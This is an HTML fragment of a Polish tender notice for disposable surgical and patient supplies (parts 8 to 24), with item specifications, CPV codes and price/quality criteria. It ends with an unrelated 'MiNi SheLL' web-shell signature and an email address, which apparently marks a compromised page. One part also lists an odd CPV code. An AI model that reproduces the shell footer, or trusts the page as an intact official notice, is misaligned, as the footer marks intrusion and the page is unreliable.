<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> pozycja nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zarękawnik chirurgiczny, sterylny, z mankietem bawełnianym, foliowo-wiskozowy,     a 2szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> pozycja nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Osłona na kończynę,sterylna,rozmiar 100-105 x 40cm, foliowo-wiskozowa.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> pozycja nr 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Spodnie jednorazowe do kolonoskopii, z włókniny, krótkie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> pozycja nr 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Koszula jednorazowa z włókniny, dla pacjenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> pozycja nr 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Komplet chirurgiczny jednorazowego użytku (bluza i spodnie). Nogawki bez sciagaczy. W spodniach zamiast gumki wciagniety trok z tej samej włókniny co cały komplet, bluza z kieszenia, przy szyi wykonczenie typu V, materiał na całej powierzchni włóknina SMMS 100% polipropylen o min. gramaturze 45 g/m2, Materiał ubrania bezwzglednie musi spełniac wymogi normy EN 13795-1-3, Rozmiary  M, L, XL.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> pozycja nr 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta sterylna , operacyjna , pełnobarierowa ,min. 2 warstwowa  90 -100 x 100 cm o gramaturze min 54 g/m2  , skład włókniny : polipropylen , polietylen.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> pozycja nr 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta jałowa operacyjna , pełnobarierowa , trójwarstwowa , o wym. 50 x 60 cm , samoprzylepna , otwór o śr. 7 cm . , gramatura serwety na całym obszarze min. 74 g / m 2 skład włókniny : włóknina polipropylenowa, folia poliuretanowa , włóknina wiskozowa ,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> pozycja nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serweta na stolik narzędziowy, sterylna o wym. 200 x 150 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> pozycja nr 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Higieniczne prześcieradła, składane, papierowo-foliowe, 80 x 170cm, chłonność 200ml, wzmocnione 8 nitkami z poliestru, bibułka 24g/m2, folia PE13my, 2 warstwowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> pozycja nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Higieniczne prześcieradła, składane, papierowo-foliowe, 80 x 210cm, chłonność 200ml, wzmocnione 8 nitkami z poliestru, bibułka 24g/m2, folia PE13my, 2 warstwowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> pozycja 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkład z włókniny nie sterylny 40g/m2 150 x 75 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> pozycja nr 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkład z włókniny nie sterylny 40g/m2 150 x 210 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 31.41.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> pozycja nr 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny zestaw do operacji barku; Skład: 
1 x  serweta na stolik instrumentariuszki o wym. 150 x190cm,
1 x serweta na stolik Mayo wzmocniona o wym. 80 x 140cm, 
1 x serweta z wycięciem U o wym. 200 x 260cm,
(serweta z wycięciem U samoprzylepnym o wym. 8,5x85cm)
1 x serweta o wym 150 x 180cm
(serweta samoprzylepna)
1 x serweta o wym 170 x 180cm
(serweta samoprzylepna)
1 x rękaw o wymiarach 30 x 60cm,
1 x taśma przylepna o wym. 10 x 50cm,
4 x ręcznik do rąk o wym. 30 x 30cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> pozycja nr 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny pokrowiec foliowy na przewody , złożony teleskopowo z taśmami mocującymi na końcówkach  w roz. 13 x 200 - 250 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> pozycja nr 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny pokrowiec na elementy aparatury medycznej  wykonany z foli PE , ściągnięty elastyczną gumką , przeźroczysty w roz. 80 - 85 x150 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> pozycja nr 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przescieradło białe papierowe w rolce o wym. 50cm x 50m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> pozycja nr 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przescieradło białe papierowe w rolce o wym. 60cm x 50m.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.11.34.00-3, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. Jakość - 35</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com